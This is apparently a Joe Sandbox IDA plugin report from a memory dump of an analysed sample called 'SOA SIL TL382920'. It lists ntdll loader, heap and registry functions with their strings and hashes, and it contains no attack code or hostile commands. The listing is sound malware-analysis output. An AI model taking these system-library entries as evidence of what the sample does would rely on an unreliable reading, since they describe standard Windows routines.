Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: dba48bdfba24d75f102deca805d2ab7019adbe3bfb671b53e0731964efb1a5ff
Instruction ID: d1a819854da4b519cb4ff7756c0031060f2e86098a6ec09a9a0b87fa3e525189
Opcode Fuzzy Hash: dba48bdfba24d75f102deca805d2ab7019adbe3bfb671b53e0731964efb1a5ff
Instruction Fuzzy Hash: D3E19F316087419FE765CF2CC884B6ABBE1FB44318F140A59FAA5CB2D1D774EA44CB52

Function 0183B5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON

Download Yara Rule

Strings

MUI, xrefs: 0183B5F8, 0183B707
LdrResGetRCConfig Exit, xrefs: 0183B634
LdrResGetRCConfig Enter, xrefs: 0183B622

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 0-1145731471
Opcode ID: 7287eff3fbc64f24756b713035248ea7fc5be910ff02936f11a51deba8504296
Instruction ID: 6eded737031d3b1c6c41ba9a9502d9aeaa8a93c61478a75623c0bf2cf18c6580
Opcode Fuzzy Hash: 7287eff3fbc64f24756b713035248ea7fc5be910ff02936f11a51deba8504296
Instruction Fuzzy Hash: DDB19E71A006098FDF26CF69C890BAEBBB5BF84714F1C8429E911DB791D730EA40DB90

Function 0182A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 0182A171
\??\, xrefs: 0188BF73
FilterFullPath, xrefs: 0188C075

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: cd2b17b40bab66db0f4a9324665ebe38309bdda1ee7a1364ef1f672adbe44669
Instruction ID: 9f27c40c8a024fd0fc2d3c1a0d1047f077ae001240601364745cfa4ee0d21f49
Opcode Fuzzy Hash: cd2b17b40bab66db0f4a9324665ebe38309bdda1ee7a1364ef1f672adbe44669
Instruction Fuzzy Hash: FBA15B719016299BDB31AF28CC88BEAB7B8EF44714F1005EAE909E7250D7359F85CF51

Function 0183B360 Relevance: 4.0, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

LdrpResGetResourceDirectory Exit, xrefs: 0183B397
LdrpResGetResourceDirectory Enter, xrefs: 0183B385
{, xrefs: 018935BD

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
API String ID: 0-373624363
Opcode ID: ab38d901eeb8b1fe349f8fa149d89ab59fb2a22093fa6e177d13ffd8828f6a53
Instruction ID: 86094ec688ccf8eaf43c05cac8999897dbd0cce92905c348aed5484b55f78727
Opcode Fuzzy Hash: ab38d901eeb8b1fe349f8fa149d89ab59fb2a22093fa6e177d13ffd8828f6a53
Instruction Fuzzy Hash: FD918CB1A05259CBEB21CF68C4507AEBBB0FF84324F184199E915EB2D0D3789B80CB95

Function 0190B2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON

Download Yara Rule

Strings

TargetNtPath, xrefs: 0190B3AF
GlobalizationUserSettings, xrefs: 0190B3B4
\Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0190B3AA

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
API String ID: 0-505981995
Opcode ID: 9fc243d637b4987303928f4fffdc33d298326113065e53b8f5c688b3a77eb834
Instruction ID: b33d038aeb95c76b5244c60d03524e9760e556c7ff4028ed1bb719966d1004a8
Opcode Fuzzy Hash: 9fc243d637b4987303928f4fffdc33d298326113065e53b8f5c688b3a77eb834
Instruction Fuzzy Hash: 1061407694122DAFDB32DF54DC88B99B7B8AB14711F0101E9EA09A7290DB74DF84CF90

Function 01859723 Relevance: 3.9, Strings: 3, Instructions: 179COMMON

Download Yara Rule

Strings

LdrpUnloadNode, xrefs: 0189DAF5
Unmapping DLL "%wZ", xrefs: 0189DAEE
minkernel\ntdll\ldrsnap.c, xrefs: 0189DAFF

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 0-2283098728
Opcode ID: 992a6378f4661242cb0989648e15bfb9106e5a4567de2caec4d18da4c5834dff
Instruction ID: 0238dcbb43ceb563cd0704bcb9595f6c7168896b8e53068b835315c4795b57fd
Opcode Fuzzy Hash: 992a6378f4661242cb0989648e15bfb9106e5a4567de2caec4d18da4c5834dff
Instruction Fuzzy Hash: 96511431B04306DBDB65EF3CC884A2977A5FB94718F18062DED55C7695EB74AB00CB82

Function 0182F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 0188E435
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0188E455
HEAP: , xrefs: 0188E442

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: 345953102cceefe5eec0701a5915fc0f3a1b914a0a51adcab39fea28eed03635
Instruction ID: 06ed23e06a555cc9daad67a0414d195cb781cebac024f3538bc8e7027cf5cbba
Opcode Fuzzy Hash: 345953102cceefe5eec0701a5915fc0f3a1b914a0a51adcab39fea28eed03635
Instruction Fuzzy Hash: AF51C1316446A9AFE722DBACC884B6ABBF8FF15704F0440A5E641CB692D774EB40CB51

Function 01851514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

LdrpCompleteMapModule, xrefs: 0189A39D
Could not validate the crypto signature for DLL %wZ, xrefs: 0189A396
minkernel\ntdll\ldrmap.c, xrefs: 0189A3A7

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 80f18215f38d9f2ad960baa0fd91df905577251d9a407f46b92f9e4d6c17fe6b
Instruction ID: 3000c1d46b3d9b0d8d61219d1b2cc78c9a95168bb9f8e7a86c6f45a3459287fe
Opcode Fuzzy Hash: 80f18215f38d9f2ad960baa0fd91df905577251d9a407f46b92f9e4d6c17fe6b
Instruction Fuzzy Hash: 3C51D331A047459BEB26CB6CC988B2A7BE4FB44758F180694FD52DB6D2D774EB00CB41

Function 018DD62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 018DD792
Heap block at %p modified at %p past requested size of %Ix, xrefs: 018DD7B2
HEAP: , xrefs: 018DD79F

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: c0ddc80c641e4f03d78e1019cb7ccdd1ab7db87bde7e8f416f9a5df39119e5ed
Instruction ID: 6ace24c1e7d7271ca2cb33309379d8aa46d3d63235f1018a7e38f452fc48e4d8
Opcode Fuzzy Hash: c0ddc80c641e4f03d78e1019cb7ccdd1ab7db87bde7e8f416f9a5df39119e5ed
Instruction Fuzzy Hash: 7A515535200394CEE375CAAEC8447727BE1DF45348F068A8DE4D6CB2C5E225EA42DBA0

Function 0186C640 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 018A80F3
LdrpInitializePerUserWindowsDirectory, xrefs: 018A80E9
Failed to reallocate the system dirs string !, xrefs: 018A80E2

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 933c4a1c64de1566defe726de881ce2fd1bf62ab70fe82ebda383cd6fb8052ea
Instruction ID: 876a9e55abad62d7560ea473fea9767130eff7586da6ca7a560090ed6563e75c
Opcode Fuzzy Hash: 933c4a1c64de1566defe726de881ce2fd1bf62ab70fe82ebda383cd6fb8052ea
Instruction Fuzzy Hash: 2641EE71509315ABDB31EF68EC44B5B7BE8FB44714F00092EF988D3255EB74EA008BA6

Function 0182753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

Invalid address specified to %s( %p, %p ), xrefs: 0188AD5A
HEAP[%wZ]: , xrefs: 0188AD3A
HEAP: , xrefs: 0188AD47

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: 595c83bd95d102260cf8ae52569c9f47890b9f17a94dccc83e685bdd558e205c
Instruction ID: 7b76130ba8fcab662c9c97f814327861890fe153b9c6e528459ea6e9f19cc229
Opcode Fuzzy Hash: 595c83bd95d102260cf8ae52569c9f47890b9f17a94dccc83e685bdd558e205c
Instruction Fuzzy Hash: 614105342402A08FEF3BDE1EC4D4775BBD09F11308F2844ABD586CB696D665DB85CB61

Function 018B43D5 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 018B4519
LdrpCheckRedirection, xrefs: 018B450F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 018B4508

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 8840dd23be2a1307a0be5b0ce1865921b038a955a41a65dc9770589a7f73ac86
Instruction ID: d6395118c47317bb6450c97c990dd2ef32010ea293c4391d473e055ef3b3b1ae
Opcode Fuzzy Hash: 8840dd23be2a1307a0be5b0ce1865921b038a955a41a65dc9770589a7f73ac86
Instruction Fuzzy Hash: 7A4104326067219FCB21CF5CD8C2AA67BE4BF48714B050669ED4AD7357D738EA20CB81

Function 018BB214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

@, xrefs: 018BB2F0
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 018BB2B2
GlobalFlag, xrefs: 018BB30F

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: 12707c2592034a6ccb50ee9bf7197ad617db96ebae2b327b977a77386184d508
Instruction ID: 0a181d3f3babf59cbd46e2a03403a1e8058548eba53db0700039617b7e5099c3
Opcode Fuzzy Hash: 12707c2592034a6ccb50ee9bf7197ad617db96ebae2b327b977a77386184d508
Instruction Fuzzy Hash: 52313E71A01209AFDB10EF99CC81AEFBBBCEF48744F440469EA01E7251D7749B448B91

Function 01871190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0187119B
@, xrefs: 018711C5
BuildLabEx, xrefs: 0187122F

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
Instruction ID: e7adcaec35c2750a55582c541dc685bf0c4bb63936531138d4459ed096bb53a3
Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
Instruction Fuzzy Hash: E73193B290061ABBDF12DB98CC44EEEBBBDEB94754F104025E614E7260E730DB058B91

Function 018451C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 018454C3
@, xrefs: 01845365

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 4a78aee7da1b4d75fdb8b58f6cfbd883f973460e1f2143805585f613d970f15b
Instruction ID: d577004ed6de1f6339035207fe0b1653b13d4321afe42c1d5b5390265f4b1b89
Opcode Fuzzy Hash: 4a78aee7da1b4d75fdb8b58f6cfbd883f973460e1f2143805585f613d970f15b
Instruction Fuzzy Hash: A1329D715083598BDB24CF19C480B3EBBE1EF89714F19492EFA95D7290EB34DA44CB92

Function 018AE372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 018AE3D1
Legacy, xrefs: 018AE3DA

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: ace8622a2459d469ee5caeb5ccf1487b4ffa345b83c71bc72b0eec7837a7641c
Instruction ID: 720c9a3b8c758c1a1706582d719302442bb56aca1d9acf37de65a3639fbdef90
Opcode Fuzzy Hash: ace8622a2459d469ee5caeb5ccf1487b4ffa345b83c71bc72b0eec7837a7641c
Instruction Fuzzy Hash: 98616E71A406099FEB25DFACC980BADBBB9FF44704F54482DE649EB251E730DA40CB60

Function 0190B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 0190B5C4
RedirectedKey, xrefs: 0190B60E

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
API String ID: 0-1388552009
Opcode ID: e0b90846c416d4503f55b264eda7572d362f766179561247ddafc05a0b4dcb84
Instruction ID: 0fe1deaa2c717c07b046c5aef289ce7ded027a17501a27f6d095de59946caf93
Opcode Fuzzy Hash: e0b90846c416d4503f55b264eda7572d362f766179561247ddafc05a0b4dcb84
Instruction Fuzzy Hash: 1C61E3B5C0121DEFDB22DF94C889ADEBBB8FB48710F54405AE906E7244D7349A45CFA0

Function 0184F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

$, xrefs: 0184F716
$, xrefs: 0184F780

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: $$$
API String ID: 0-233714265
Opcode ID: d7cc5e765dad2e069bbb29abae89af47c8cd8d3202852304c40427081816deb1
Instruction ID: a7af1b7af1d62d6b467ac3c5524a89af4c4aa3c5b90f4399183efb0929f93d79
Opcode Fuzzy Hash: d7cc5e765dad2e069bbb29abae89af47c8cd8d3202852304c40427081816deb1
Instruction Fuzzy Hash: 75618971A0178ECBEB21DFACC580BADBBB1BB54708F14446DD605EB691CB74AA40CB91

Function 01830485 Relevance: 2.6, Strings: 2, Instructions: 135COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01830586
kLsE, xrefs: 018305FE

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 96c41c4bef1b043dc6716283df48d05c796d5fbdc8dbde74414b3942c9221f60
Instruction ID: 16e1e6acff20b305adf3d0fcb11e11a55ecd9bd453cb9c095419706c3a673698
Opcode Fuzzy Hash: 96c41c4bef1b043dc6716283df48d05c796d5fbdc8dbde74414b3942c9221f60
Instruction Fuzzy Hash: 8E51A271A0074ADFDB24EFA8C4446AAB7F4AF84304F18453EF696D3281E7749744CBA2

Function 0183A1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 0183A229
RtlpResUltimateFallbackInfo Enter, xrefs: 0183A21B

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: b9841fe4e3aba64322ab0dd9366de7a23040467f4d4148bc78135d99a991c307
Instruction ID: 8f8e6123d2e5d6864090cd3f5ce19bc2820653731520a63a4c7406fe5219f86f
Opcode Fuzzy Hash: b9841fe4e3aba64322ab0dd9366de7a23040467f4d4148bc78135d99a991c307
Instruction Fuzzy Hash: 4341EE30600619DBDB19CFADC840B69BBB5FF85744F1840A5EE40DB2A1E636DB00CB91

Function 018633D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

RtlpInitializeAssemblyStorageMap, xrefs: 018A289A
SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 018A289F

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
API String ID: 0-2653619699
Opcode ID: 4dba446cbfc18562394d1bfb7d1aa6bfa3136b69f87f3dff1472676b7fc1c93e
Instruction ID: 22d63675df0b931b9d199a10299f65f9c658e0a52804b569f46952225a39fc79
Opcode Fuzzy Hash: 4dba446cbfc18562394d1bfb7d1aa6bfa3136b69f87f3dff1472676b7fc1c93e
Instruction Fuzzy Hash: 4F11E976B00605BBF7268A4DCD81F6BBAADEB94B54F14802DBE08DB344D674DF0082A1

Function 0183C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0183C7E3, 0183C960

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 36e2069241e510b0d6d5285cb0396d90df26117987613d65b6aa14550c75022d
Instruction ID: 799b904dc8d9b2ba01b6c333d19864bb971c323f2e648313628a6e9625ba2def
Opcode Fuzzy Hash: 36e2069241e510b0d6d5285cb0396d90df26117987613d65b6aa14550c75022d
Instruction Fuzzy Hash: 88825C75E002098FEB25CFA9C8807ADFBB5BF88714F18816AD959EB251D7309E41CB90

Function 0183965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

@, xrefs: 01839713

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
Instruction ID: 5df9a9a97803a2e4e8be0fe817b3619d6948fff8cec3371e184cbc5992f0b3dc
Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
Instruction Fuzzy Hash: BA612A75D0121AABDF22DF99C840BEEBBB5EF84718F184169E910F7290D7B49B01CB91

Function 018402F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#%u, xrefs: 01894B8F

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: #%u
API String ID: 0-232158463
Opcode ID: f76a6b531391ad119c62bc9f88697594fe77813fdfc1ae23f4b1acc5768f2d8d
Instruction ID: 5afa070c624542d3b4ad975946938f31de60e39e8c3f2de69e4309a148ee344a
Opcode Fuzzy Hash: f76a6b531391ad119c62bc9f88697594fe77813fdfc1ae23f4b1acc5768f2d8d
Instruction Fuzzy Hash: 43714C71A0014A9FDB15DFA9C984BAEBBF8FF18704F144065EA01E7251EB34EA41CBA1

Function 018BF42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

@, xrefs: 018BF4E7

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: d2eb3336cdea1cab666276e98872f9f9051bd475e438ef54c546f7dbc5e9d23b
Instruction ID: 22685c9a48609524cfd61a4f837a902fc1401911ac35ee6bfbdb024ca009bb78
Opcode Fuzzy Hash: d2eb3336cdea1cab666276e98872f9f9051bd475e438ef54c546f7dbc5e9d23b
Instruction Fuzzy Hash: 99516E72504746AFE7229F68CC80FABB7E8FB94714F000929BA51D7290D775EA14CB92

Function 0184E547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0184E5C4

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: b9f91ccc64f0f08ab1a2908f67745197b80ba60feebed989596500d6d38628bd
Instruction ID: dbe156f70e5c22944bc33f68bf879eae5495c636c74b23d88db452c9ce37e24e
Opcode Fuzzy Hash: b9f91ccc64f0f08ab1a2908f67745197b80ba60feebed989596500d6d38628bd
Instruction Fuzzy Hash: 3D41947251531A9BD721DB69C844B6BB7D8BF88718F040A2DF584E7180EA78DB04C797

Function 018641BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 01864220

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: a98db0297944ff3b6fc3ce5d73e364918b5c5eafb967b7c6dfd5b147c874b185
Instruction ID: 695d60fb90662743b18db93935dd5812cece5ba91055b81bcc38bddfcf0fde41
Opcode Fuzzy Hash: a98db0297944ff3b6fc3ce5d73e364918b5c5eafb967b7c6dfd5b147c874b185
Instruction Fuzzy Hash: 16518971500711ABD321DF59C840A6BBBE9FF48710F00892EFA95D76A0E774EA54CB92

Function 018AC3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 018AC3FF

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 5124411875288bd9dc19be57fe42756f4e82a0e4e043e182522409aa73225cd8
Instruction ID: 65e2c5d4b89f4cb2b2e948d99596c3def47c9dc17c3bb51b343dfc04b77c18f2
Opcode Fuzzy Hash: 5124411875288bd9dc19be57fe42756f4e82a0e4e043e182522409aa73225cd8
Instruction Fuzzy Hash: AC4155B290152DABEB21DA54CC84FEEB77CAB44714F4045E5E708E7141DB709F888FA9

Function 01867425 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 018A442D

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: ce13f2566b957689a95f82cf48c80de67ac08f792150cba515d6f82dc24c1897
Instruction ID: 2f1896155e5752ddf1424ba16adde6c98db97b6dd5f2ac443ab2c16b85470a0a
Opcode Fuzzy Hash: ce13f2566b957689a95f82cf48c80de67ac08f792150cba515d6f82dc24c1897
Instruction Fuzzy Hash: 9441AD75A0061ADBDF21DF88C484BBEBBB9FF40709F00409AE945E7241DB349A41C7D2

Function 018296E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

3w3w, xrefs: 01829757

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: 3w3w
API String ID: 0-4263324190
Opcode ID: 4ef25fd2f2880783a4f40203820bc45269fbe8b5680e3f9f924df038c18d6c15
Instruction ID: 9974724380c3618d147c6c9092fa786bd8cbeddf30e42d768aa74ed960f5f160
Opcode Fuzzy Hash: 4ef25fd2f2880783a4f40203820bc45269fbe8b5680e3f9f924df038c18d6c15
Instruction Fuzzy Hash: B821D376A00735AFC7229F588440B1ABBB5FF84B58F120429E655DB341DA70DF40CB91

